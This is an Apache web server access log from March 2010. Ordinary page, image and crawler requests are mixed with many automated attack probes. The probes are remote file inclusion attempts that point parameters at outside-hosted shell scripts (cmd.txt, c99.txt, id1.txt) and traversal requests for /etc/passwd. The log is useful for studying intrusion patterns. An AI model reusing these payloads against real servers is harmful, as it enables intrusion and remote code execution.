125.18.8.178 - - [19/Mar/2010:03:02:21 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.18.8.178 - - [19/Mar/2010:03:02:21 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.18.8.178 - - [19/Mar/2010:03:02:21 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.18.8.178 - - [19/Mar/2010:03:02:22 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.18.8.178 - - [19/Mar/2010:03:02:22 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.18.8.178 - - [19/Mar/2010:03:02:23 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.18.8.178 - - [19/Mar/2010:03:02:23 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.18.8.178 - - [19/Mar/2010:03:02:24 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.18.8.178 - - [19/Mar/2010:03:02:24 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
95.108.128.242 - - [19/Mar/2010:03:01:44 -0400] "GET /logs/error_log.Q109111100 HTTP/1.1" 200 3590466 "-" "Yandex/1.01.001 (compatible; Win16; I)"
125.18.8.178 - - [19/Mar/2010:03:02:24 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.18.8.178 - - [19/Mar/2010:03:02:24 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.18.8.178 - - [19/Mar/2010:03:02:25 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.18.8.178 - - [19/Mar/2010:03:02:25 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01-170-31" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
81.4.80.187 - - [19/Mar/2010:03:02:47 -0400] "GET /logs//good.php?board_skin_path=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:02:47 -0400] "GET //good.php?board_skin_path=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:02:47 -0400] "GET /logs/access_log.Q109102300%20%20//good.php?board_skin_path=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:02:48 -0400] "GET //good.php?board_skin_path=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:02:48 -0400] "GET /logs/access_log.Q109102300%20%20//good.php?board_skin_path=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:02:48 -0400] "GET /logs//good.php?board_skin_path=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
62.109.16.40 - - [19/Mar/2010:03:03:03 -0400] "GET /logs/access_log.Q110012500//bbs//delete_all.php?board_skin_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:03:03:04 -0400] "GET /logs/access_log.Q110011600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
219.240.39.222 - - [19/Mar/2010:03:03:34 -0400] "GET //index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://hep.or.kr/zbxe/files/cache/optimized/78d0457bf8c810bcb5cef1f8c08a056c/sc1??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.240.39.222 - - [19/Mar/2010:03:03:34 -0400] "GET /logs//index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://hep.or.kr/zbxe/files/cache/optimized/78d0457bf8c810bcb5cef1f8c08a056c/sc1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.240.39.222 - - [19/Mar/2010:03:03:34 -0400] "GET /logs/access_log.Q109091000%20%20//index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://hep.or.kr/zbxe/files/cache/optimized/78d0457bf8c810bcb5cef1f8c08a056c/sc1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.65.53 - - [19/Mar/2010:03:03:49 -0400] "GET /images/items/5099001_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
219.240.39.222 - - [19/Mar/2010:03:04:00 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.251.99.2 - - [19/Mar/2010:03:04:05 -0400] "GET //good.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.251.99.2 - - [19/Mar/2010:03:04:06 -0400] "GET /logs/access_log.Q109102300//good.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.251.99.2 - - [19/Mar/2010:03:04:07 -0400] "GET /logs//good.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
194.24.174.51 - - [19/Mar/2010:03:05:30 -0400] "GET /logs/access_log.Q110010900%20/index.php?doc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "-"
194.24.174.51 - - [19/Mar/2010:03:05:30 -0400] "GET /logs/index.php?doc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "-"
194.24.174.51 - - [19/Mar/2010:03:05:30 -0400] "GET /logs/access_log.Q110010900%20/index.php?doc=./../../../../../../../../etc/passwd HTTP/1.1" 404 235 "-" "-"
194.24.174.51 - - [19/Mar/2010:03:05:31 -0400] "GET /logs/index.php?doc=./../../../../../../../../etc/passwd HTTP/1.1" 404 212 "-" "-"
194.24.174.51 - - [19/Mar/2010:03:05:31 -0400] "GET /index.php?doc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "-"
194.24.174.51 - - [19/Mar/2010:03:05:31 -0400] "GET /index.php?doc=./../../../../../../../../etc/passwd HTTP/1.1" 404 207 "-" "-"
122.29.49.45 - - [19/Mar/2010:03:05:32 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.29.49.45 - - [19/Mar/2010:03:05:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
219.240.39.222 - - [19/Mar/2010:03:05:35 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://hep.or.kr/zbxe/files/cache/optimized/78d0457bf8c810bcb5cef1f8c08a056c/sc1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.29.49.45 - - [19/Mar/2010:03:05:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.29.49.45 - - [19/Mar/2010:03:05:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [19/Mar/2010:03:05:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.241.177.123 - - [19/Mar/2010:03:06:01 -0400] "GET /logs/access_log.Q109112100/akocomments.php?mosConfig_absolute_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:03:06:03 -0400] "GET /logs/error_log.Q110022400/default.php?page=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.115.111.242 - - [19/Mar/2010:03:06:13 -0400] "GET /images/_notes/banner_connect_over.gif.mno HTTP/1.1" 200 255 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [19/Mar/2010:03:06:17 -0400] "GET /images/_notes/banner_connect_over.jpg.mno HTTP/1.1" 200 255 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [19/Mar/2010:03:06:21 -0400] "GET /images/_notes/download_RCF_RCT_lg.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
212.241.177.123 - - [19/Mar/2010:03:06:25 -0400] "GET /logs/access_log.Q109063000/akocomments.php?mosConfig_absolute_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
208.115.111.242 - - [19/Mar/2010:03:06:25 -0400] "GET /images/_notes/download_RCF_RCT_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [19/Mar/2010:03:06:31 -0400] "GET /images/_notes/download_autogft_lg.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [19/Mar/2010:03:06:36 -0400] "GET /images/_notes/download_autogft_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [19/Mar/2010:03:06:41 -0400] "GET /images/_notes/download_check_back.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [19/Mar/2010:03:06:46 -0400] "GET /images/_notes/download_osteotomes.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [19/Mar/2010:03:06:51 -0400] "GET /images/_notes/download_tut_tissue.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [19/Mar/2010:03:06:56 -0400] "GET /images/_notes/headline_summersale.jpg.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
82.179.244.70 - - [19/Mar/2010:03:07:53 -0400] "GET /logs/error_log.Q110011600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
199.120.90.223 - - [19/Mar/2010:03:08:00 -0400] "GET /logs/access_log.Q110012500//////?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 230 "-" "libwww-perl/5.812"
199.120.90.223 - - [19/Mar/2010:03:08:00 -0400] "GET //////?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 456 "-" "libwww-perl/5.812"
199.120.90.223 - - [19/Mar/2010:03:08:01 -0400] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 42699 "-" "libwww-perl/5.812"
95.108.128.242 - - [19/Mar/2010:03:07:42 -0400] "GET /logs/access_log.Q109111200 HTTP/1.1" 200 5102390 "-" "Yandex/1.01.001 (compatible; Win16; I)"
125.247.160.130 - - [19/Mar/2010:03:08:31 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:08:31 -0400] "GET /logs/access_log.Q109062700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:08:31 -0400] "GET /logs/access_log.Q109082900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:08:31 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:08:32 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:08:32 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:08:32 -0400] "GET /logs/access_log.Q109062700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:08:32 -0400] "GET /logs/access_log.Q109082900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
64.237.46.229 - - [19/Mar/2010:03:08:34 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.831"
125.247.160.130 - - [19/Mar/2010:03:08:39 -0400] "GET /logs/access_log.Q109062700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:08:39 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:08:39 -0400] "GET /logs/access_log.Q109082900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:08:39 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.29.80.127 - - [19/Mar/2010:03:08:42 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
70.98.34.37 - - [19/Mar/2010:03:08:43 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
92.63.130.106 - - [19/Mar/2010:03:08:49 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
77.221.130.11 - - [19/Mar/2010:03:09:11 -0400] "GET //index2.php?p=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
95.110.196.60 - - [19/Mar/2010:03:09:11 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
88.84.95.167 - - [19/Mar/2010:03:09:22 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
82.76.12.197 - - [19/Mar/2010:03:09:24 -0400] "GET //index2.php?p=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.831"
84.40.30.37 - - [19/Mar/2010:03:09:26 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
84.40.30.37 - - [19/Mar/2010:03:09:26 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.56.65.232 - - [19/Mar/2010:03:09:30 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
195.56.65.232 - - [19/Mar/2010:03:09:40 -0400] "GET /logs/access_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
195.56.65.232 - - [19/Mar/2010:03:09:40 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
195.56.65.232 - - [19/Mar/2010:03:09:40 -0400] "GET /logs//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
124.217.242.70 - - [19/Mar/2010:03:10:39 -0400] "GET /logs/error_log.Q110011600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.237.46.229 - - [19/Mar/2010:03:10:59 -0400] "GET /logs/access_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.831"
64.237.46.229 - - [19/Mar/2010:03:10:59 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.831"
64.237.46.229 - - [19/Mar/2010:03:10:59 -0400] "GET /logs//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.831"
72.29.80.127 - - [19/Mar/2010:03:11:04 -0400] "GET /logs/access_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
72.29.80.127 - - [19/Mar/2010:03:11:04 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
72.29.80.127 - - [19/Mar/2010:03:11:04 -0400] "GET /logs//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
92.63.130.106 - - [19/Mar/2010:03:11:06 -0400] "GET /logs/access_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
92.63.130.106 - - [19/Mar/2010:03:11:06 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
92.63.130.106 - - [19/Mar/2010:03:11:06 -0400] "GET /logs//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
95.110.196.60 - - [19/Mar/2010:03:11:32 -0400] "GET /logs/access_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
95.110.196.60 - - [19/Mar/2010:03:11:32 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
95.110.196.60 - - [19/Mar/2010:03:11:32 -0400] "GET /logs//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
70.98.34.37 - - [19/Mar/2010:03:11:40 -0400] "GET /logs/access_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
70.98.34.37 - - [19/Mar/2010:03:11:40 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
70.98.34.37 - - [19/Mar/2010:03:11:40 -0400] "GET /logs//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
88.84.95.167 - - [19/Mar/2010:03:11:54 -0400] "GET /logs/access_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
88.84.95.167 - - [19/Mar/2010:03:11:55 -0400] "GET //index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
88.84.95.167 - - [19/Mar/2010:03:11:55 -0400] "GET /logs//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
82.179.244.70 - - [19/Mar/2010:03:12:12 -0400] "GET /logs/access_log.Q110011600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:03:12:17 -0400] "GET /logs/error_log.Q110011600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
82.76.12.197 - - [19/Mar/2010:03:12:20 -0400] "GET /logs/access_log.Q109070200//index2.php?p=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.831"
82.76.12.197 - - [19/Mar/2010:03:12:20 -0400] "GET //index2.php?p=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.831"
82.76.12.197 - - [19/Mar/2010:03:12:20 -0400] "GET /logs//index2.php?p=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.831"
201.28.110.99 - - [19/Mar/2010:03:12:32 -0400] "GET ///write_comment_update.php?board_skin_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:03:12:32 -0400] "GET /logs/access_log.Q110020800%20%20///write_comment_update.php?board_skin_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:03:12:32 -0400] "GET /logs///write_comment_update.php?board_skin_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
77.221.130.11 - - [19/Mar/2010:03:12:33 -0400] "GET /logs/access_log.Q109070200//index2.php?p=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
77.221.130.11 - - [19/Mar/2010:03:12:33 -0400] "GET //index2.php?p=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
77.221.130.11 - - [19/Mar/2010:03:12:35 -0400] "GET /logs//index2.php?p=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
92.63.130.106 - - [19/Mar/2010:03:13:11 -0400] "GET /logs/error_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
64.237.46.229 - - [19/Mar/2010:03:13:14 -0400] "GET /logs/error_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
